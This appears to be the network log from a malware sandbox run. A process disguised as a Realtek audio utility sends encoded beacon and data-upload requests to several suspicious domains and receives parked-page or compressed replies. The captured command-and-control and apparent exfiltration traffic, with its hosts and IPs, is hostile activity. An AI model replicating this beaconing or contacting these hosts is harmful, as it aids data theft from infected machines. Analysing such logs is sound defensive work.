Jan 13, 2025 10:24:45.232635975 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 09:24:45 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.11.20	49822	47.83.1.90	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:47.093590975 CET	529	OUT	GET /gcvb/?AuPF3v=R3JWUl3ivpsXcFtCJulnieIWto+O00LjcoMED/ZSuHZ0i4hSpIKzgOSsfpnIAqnHyqi+O0adg4Vr07jACry21CI+4oE0/hewEO2O8KeqeYy4LCD4K2ParBE=&v1GdZ=vUN3 HTTP/1.1 Host: www.lejgnu.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:24:48.097130060 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 09:24:47 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.11.20	49823	194.9.94.86	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:56.381201029 CET	528	OUT	GET /js1x/?v1GdZ=vUN3&AuPF3v=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec= HTTP/1.1 Host: www.milp.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:24:56.595937967 CET	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 09:24:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 13, 2025 10:24:56.596174955 CET	1289	IN	Data Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61 Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
Jan 13, 2025 10:24:56.596288919 CET	1289	IN	Data Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
Jan 13, 2025 10:24:56.596407890 CET	1289	IN	Data Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
Jan 13, 2025 10:24:56.596486092 CET	661	IN	Data Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
Jan 13, 2025 10:24:56.596497059 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.11.20	49824	45.56.79.23	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:01.738528013 CET	793	OUT	POST /jwa9/ HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.chiro.live Referer: http://www.chiro.live/jwa9/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 4a 51 5a 33 37 4c 6f 44 49 59 30 2f 43 6e 6b 43 57 72 52 43 67 3d 3d Data Ascii: AuPF3v=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoJQZ37LoDIY0/CnkCWrRCg==
Jan 13, 2025 10:25:01.872463942 CET	804	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Mon, 13 Jan 2025 09:25:01 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 36 e0 cf b8 81 74 12 d7 9f 25 76 e2 38 01 7c c9 08 49 b1 44 84 44 41 80 9d 4e ff 7b c1 74 62 3a ee a1 3a 20 ed b2 fb 76 df 5b c9 fc f0 6d 39 5c 7b 77 23 85 c8 90 5d 9d 99 e5 a6 30 c0 b7 96 8a b9 7a 75 a6 14 cb 24 18 a0 ea 78 30 43 2c 81 02 09 88 13 2c 2d f5 71 3d 6e 5c fc 89 3c fe 26 52 46 0d fc 23 a5 99 a5 ee 1a 29 68 40 11 46 40 52 9f 61 55 81 82 4b cc 8b dc d9 c8 c2 68 8b 4f b2 39 08 b1 a5 66 14 e7 91 88 65 2d 21 a7 48 12 0b e1 8c 42 dc 38 18 9f 15 ca a9 a4 80 35 12 08 18 b6 8c a6 5e 87 93 54 32 7c 65 6a d5 7e a0 73 68 92 8b 04 c6 34 92 47 5a ff ee 3d c6 2f 31 4e 48 ad 05 fd 32 8d 99 55 f2 fb a2 69 79 9e f7 f5 26 24 34 16 4d 46 33 ac a9 8a 76 84 34 b5 d3 32 e6 41 bd ba 3c a7 25 ba ff 57 c2 d4 8e 83 31 7d 81 f6 8a e0 4c 00 64 a9 48 3c 57 c7 8f 9f ea 62 54 94 15 b9 8f 0a 75 25 de 49 2d 00 19 a8 bc b5 b8 52 89 97 94 43 49 05 57 6a 50 ca cf 77 fd ca 90 72 e5 94 23 91 37 a5 88 9a 4c c0 62 be 82 37 49 41 48 b1 14 [TRUNCATED] Data Ascii: 264SMs0WPv6t%v8\|IDDAN{tb:: v[m9\{w#]0zu$x0C,,-q=n\<&RF#)h@F@RaUKhO9fe-!HB85^T2\|ej~sh4GZ=/1NH2Uiy&$4MF3v42A<%W1}LdH<WbTu%I-RCIWjPwr#7Lb7IAH(Q] 2)Eo=ht\Hgo_^S+sgpvan9%Pp!;p1E,{LW$Y4aO/;'{x*[Odn=as[p cZOwa@rwN5s/7.d8}YzL~M)K/70

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.11.20	49825	45.56.79.23	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:04.394294024 CET	813	OUT	POST /jwa9/ HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.chiro.live Referer: http://www.chiro.live/jwa9/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 6b 61 79 78 57 75 46 65 38 4c 35 76 66 52 6a 54 69 51 6e 4a 79 74 4b 70 4c 38 2f 34 30 43 4f 6e 32 69 45 4e 73 58 62 39 56 39 46 71 39 67 42 38 6d 30 46 62 54 50 4f 52 34 78 58 52 72 6f 66 30 6b 4e 38 75 62 65 47 6a 46 4b 2b 36 6f 54 48 33 78 52 77 78 31 38 35 49 4d 4b 6e 50 4a 4b 2b 67 74 54 79 6a 2b 61 43 4e 45 4a 36 59 36 79 75 4e 35 65 64 59 68 68 34 46 6d 77 4c 65 55 65 50 32 72 39 6b 2f 64 44 71 4a 2f 4d 41 62 45 47 37 79 65 4d 41 55 71 4b 66 72 59 73 44 71 70 43 36 4f 7a 4f 78 54 6f 31 7a 42 7a 78 53 6b 49 3d Data Ascii: AuPF3v=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfkayxWuFe8L5vfRjTiQnJytKpL8/40COn2iENsXb9V9Fq9gB8m0FbTPOR4xXRrof0kN8ubeGjFK+6oTH3xRwx185IMKnPJK+gtTyj+aCNEJ6Y6yuN5edYhh4FmwLeUeP2r9k/dDqJ/MAbEG7yeMAUqKfrYsDqpC6OzOxTo1zBzxSkI=
Jan 13, 2025 10:25:04.528563976 CET	805	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Mon, 13 Jan 2025 09:25:04 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 06 8c 9d d8 6e 20 9d 84 c6 5f 25 76 e2 38 01 fb 92 11 92 62 89 08 89 82 00 3b 9d fe f7 82 e9 c4 74 dc 43 75 40 7a cb ee db dd b7 92 f5 e1 db dc 59 ae ee 6e 14 22 23 76 79 62 55 9b c2 00 df d8 2a e6 ea e5 89 52 2e 8b 60 80 ea e3 1e 46 58 02 05 12 90 a4 58 da ea e3 72 d8 ea ff f1 3c fc 26 52 c6 2d fc 23 a3 b9 ad 6e 5b 19 68 41 11 c5 40 d2 80 61 55 81 82 4b cc cb d8 c9 8d 8d d1 06 1f 45 73 10 61 5b cd 29 2e 62 91 c8 46 40 41 91 24 36 c2 39 85 b8 b5 07 9f 15 ca a9 a4 80 b5 52 08 18 b6 db 9a d1 a4 93 54 32 7c 69 e9 f5 be 6f 67 5f 24 17 29 4c 68 2c 0f 6d fd bb f6 04 bf 24 38 25 8d 12 8c 8b 2c 61 76 d5 df 17 5d 2f 8a a2 67 68 90 d0 44 68 8c e6 58 57 15 fd 40 69 e9 c7 69 ac bd 7a 4d 79 8e 53 9c fd 5f 0a 4b 3f 0c c6 0a 04 da 29 82 33 01 90 ad 22 f1 5c 1f 3f 7e 6a 8a 51 b7 ac c8 5d 5c aa 2b f1 56 ea 21 c8 41 6d 6d f8 55 4a bc 64 1c 4a 2a b8 d2 a0 52 7e be eb 57 b9 54 ab a0 1c 89 42 93 22 d6 98 80 e5 7c 05 d7 48 d9 90 62 [TRUNCATED] Data Ascii: 265SMs0WPvn _%v8b;tCu@zYn"#vybUR.`FXXr<&R-#n[hA@aUKEsa[).bF@A$69RT2\|iog_$)Lh,m$8%,av]/ghDhXW@iizMyS_K?)3"\?~jQ]\+V!AmmUJdJR~WTB"\|Hb+A@a_7>e^wntfy*$3H6w6^^Q;+u+&g0zAZsA7Os7(zGdyYI(6`x\|BuA#txE`Q;wnN1sU&k1G6!_?qPnW8P'!6}cf@k:7W7\|en0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.11.20	49826	45.56.79.23	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:07.050031900 CET	2578	OUT	POST /jwa9/ HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.chiro.live Referer: http://www.chiro.live/jwa9/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 73 61 79 44 4f 75 45 35 41 4c 34 76 66 52 70 7a 69 52 6e 4a 7a 6f 4b 70 44 77 2f 34 70 31 4f 6c 4f 69 46 76 6b 58 58 63 56 39 4f 71 39 67 4d 63 6d 78 42 62 54 67 4f 52 6f 4c 58 52 37 6f 66 30 6b 4e 38 74 54 65 42 79 46 4b 38 36 6f 4d 51 48 78 56 6d 42 30 6a 35 49 56 6f 6e 50 64 38 39 52 4e 54 78 44 75 61 4f 66 73 4a 6e 49 36 30 74 4e 35 47 64 59 63 2f 34 46 36 57 4c 64 49 34 50 31 37 39 6b 34 77 4d 35 37 58 6b 52 74 45 64 36 7a 75 32 49 32 75 67 58 4d 4d 4c 4d 5a 70 71 36 4f 79 63 2b 54 77 4f 6b 77 2f 30 47 6a 63 46 42 43 44 37 51 64 43 61 4e 65 54 61 39 41 5a 42 46 71 71 33 35 71 59 4d 4d 31 53 4d 54 6c 52 57 68 58 7a 4c 41 5a 6c 46 4b 49 48 49 4c 4c 49 73 61 31 70 66 59 4a 2b 56 76 4b 77 55 53 33 62 56 58 31 61 53 6c 71 43 7a 78 48 75 73 6b 58 51 52 67 49 63 78 55 57 4a 47 66 72 4e 76 43 71 50 78 62 53 64 56 48 36 45 4d 7a 74 4a 4d 54 58 69 6f 63 55 32 [TRUNCATED] Data Ascii: AuPF3v=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfsayDOuE5AL4vfRpziRnJzoKpDw/4p1OlOiFvkXXcV9Oq9gMcmxBbTgORoLXR7of0kN8tTeByFK86oMQHxVmB0j5IVonPd89RNTxDuaOfsJnI60tN5GdYc/4F6WLdI4P179k4wM57XkRtEd6zu2I2ugXMMLMZpq6Oyc+TwOkw/0GjcFBCD7QdCaNeTa9AZBFqq35qYMM1SMTlRWhXzLAZlFKIHILLIsa1pfYJ+VvKwUS3bVX1aSlqCzxHuskXQRgIcxUWJGfrNvCqPxbSdVH6EMztJMTXiocU20FGmUz3CWIAU+zmxLXYWK2/ftE0etZ3pNfyL/+cpWwy/VcQDV7Gq5GxCACrfZE7opOuKVfxHEzlzXSUkt19ht+DE0yksgKNQ2jthDH/A32PPzB5myuFgwMd6jCDUtCcTfi0vPJ1rRJg0A86S1KO6SJ209X85C2XpL8Ms57F6bCOdSUNNlYEa5Ngk6yq5gHRl9b/rHfxMDt+N6jXi2EhDR1EQ22P0l63H0Unr/CVTCWStQZGwiaVmxLZyCys/PCKDchCvrRfN8xMPcul2AKPxLotGE53zhoeOpTcdUXLTGiDnjrJRlxtI1cSHWSRCYnRY12ix73om2423CDf+1l0ECju4o3MUw4Zvnqp1zP7dABrBcS7mUTBcGI1fbWs2kItZs0LHxeix/nHdwozmGa/ZPJ9o/qTDYENdqIEvUfbd8O92t9OBtpcBT2RjjhvjReT175Sdrr5tNucg+saYM9wd63Q16rJXd3LK4MOBYsBxQEibHEfeLqzVgOiidz2IscMTJ44PFv+UcUK5O3hUNMr1OEg6V7G/L3zUZFKa3yBeM3Qqh6qjTOiTRNNPP8PbNsf49WSm7lKcRXBVdfsDZVV+OATcjz+LmbZVyqn9JkhY8WJDa/0nqDkzZx91ISfUftWJj817AFZjf0akeehHVq7uEIWUlfR7tb/Nxv [TRUNCATED]
Jan 13, 2025 10:25:07.050055981 CET	3867	OUT	Data Raw: 4f 5a 43 76 66 67 43 74 73 70 4a 53 45 49 70 52 70 72 2f 48 69 52 6b 78 6d 79 35 75 6a 46 79 53 6a 2f 5a 4b 52 56 74 56 6d 2f 63 75 63 37 48 54 61 31 36 4c 47 66 72 37 31 76 75 4f 4e 53 74 61 53 37 4f 6a 63 38 34 51 4b 59 46 4e 67 61 55 76 33 62 Data Ascii: OZCvfgCtspJSEIpRpr/HiRkxmy5ujFySj/ZKRVtVm/cuc7HTa16LGfr71vuONStaS7Ojc84QKYFNgaUv3b8dB2EhEL+CTRNFTCfcYxjECc94VTPbTUj7ac17b0ROdOMxZ5cSbT2ovBOxwGQk+jNW2uyMV+g/0oVhrR0kG5jzAglKXq1fJt3a7UoAYGKG2GkrnhshBjigkRag29BQOf+p9VJuLYtqcL0/hPkmw8RDo87C9nlBTbP
Jan 13, 2025 10:25:07.050133944 CET	1517	OUT	Data Raw: 76 6b 48 35 45 53 4d 6f 62 4a 76 51 4a 54 5a 61 34 33 6b 34 2b 45 6e 4e 67 2b 35 77 55 43 66 53 46 74 35 51 4b 4a 49 51 5a 2f 4e 69 62 46 57 57 6f 51 7a 54 65 7a 4e 53 6b 48 62 56 48 53 66 76 78 37 37 6a 75 6d 37 69 53 50 33 46 53 48 72 59 33 78 Data Ascii: vkH5ESMobJvQJTZa43k4+EnNg+5wUCfSFt5QKJIQZ/NibFWWoQzTezNSkHbVHSfvx77jum7iSP3FSHrY3x1dye2vFj4TkwklhEKs7k6Mqfm5AqaNs8o1vJNwZdVXrW7ukgSVTSqIWKO8Cut2Uc3mjTk1tJyFSUbQT0Jl9qQsViY/zaDBRtYe1ASq7jj0grcdzulqX95UN4sk/Qw4/dHW8InFcDbDg+Vs74pEAXXRhpO3LPDyt9C
Jan 13, 2025 10:25:07.184345007 CET	805	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Mon, 13 Jan 2025 09:25:07 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 db 72 9b 30 10 7d cf 57 50 1e 32 ed 4c 6d 6e be 36 90 4e e2 c6 b7 3a 76 e2 38 01 fc 92 11 92 62 89 08 89 82 00 3b 9d fe 7b b1 e9 c4 74 dc 87 ea 01 69 97 dd b3 7b ce 4a f6 87 6f 8b c1 ca bf bb 51 88 8c d8 e5 99 bd df 14 06 f8 c6 51 31 57 2f cf 94 72 d9 04 03 54 1d 0f 66 84 25 50 20 01 49 8a a5 a3 3e ae 86 8d de 9f c8 e3 6f 22 65 dc c0 3f 32 9a 3b ea b6 91 81 06 14 51 0c 24 0d 18 56 15 28 b8 c4 bc cc 9d dc 38 18 6d f0 49 36 07 11 76 d4 9c e2 22 16 89 ac 25 14 14 49 e2 20 9c 53 88 1b 07 e3 b3 42 39 95 14 b0 46 0a 01 c3 8e d1 d4 eb 70 92 4a 86 2f 6d ad da 0f 74 0e 4d 72 91 c2 84 c6 f2 48 eb df bd 27 f8 25 c1 29 a9 b5 a0 5f 64 09 73 f6 fc be 68 5a 51 14 5d bd 09 09 4d 44 93 d1 1c 6b aa a2 1d 21 6d ed b4 8c 7d 50 af 2e cf 69 89 f6 ff 95 b0 b5 e3 60 ec 40 a0 9d 22 38 13 00 39 2a 12 cf d5 f1 e3 a7 ba 18 15 65 45 ee e2 52 5d 89 b7 52 0b 41 0e 2a 6f 2d 6e af c4 4b c6 a1 a4 82 2b 35 28 e5 e7 bb 7e fb 90 fd 2a 28 47 a2 68 4a 11 37 99 80 e5 7c 05 6f 92 92 90 e2 [TRUNCATED] Data Ascii: 265Sr0}WP2Lmn6N:v8b;{ti{JoQQ1W/rTf%P I>o"e?2;Q$V(8mI6v"%I SB9FpJ/mtMrH'%)_dshZQ]MDk!m}P.i`@"89eER]RAo-nK+5(~(GhJ7\|o(Q@a_7ci2kuM]X}k[B<d:x75`JWt67p7LhM{TX^,d4EE9,z;>fs0^`%p\|wNlnuX{80[9ZIElfM%Ac'8p\|'pr{5{/h8]}zl~mmS^o4Dm0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.11.20	49827	45.56.79.23	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:09.704935074 CET	528	OUT	GET /jwa9/?AuPF3v=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&v1GdZ=vUN3 HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:25:09.837949991 CET	1289	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Mon, 13 Jan 2025 09:25:09 GMT content-type: text/html transfer-encoding: chunked connection: close Data Raw: 34 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 68 69 72 6f 2e 6c [TRUNCATED] Data Ascii: 495<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.chiro.live/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.chiro.live/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736760309.0064952172&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYXJncyI6ICJBdVBGM3Y9bmJFYjZCYXBqckNZZDN2cElVNjVkUlRhb1BLMmM0ODRaOURMZWxUY3JKNHA4aE9pQnBsSTM5enR6aGFhbDc2cUZZS2U4b29KRjIybUkvSnZSUFI5S1p0RVBzR1BTWnZwSHo0Z0tSYjlSSHRpdjg3U1p3eE15SWs9JnYxR2RaPXZVTjMiLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45 [TRUNCATED]
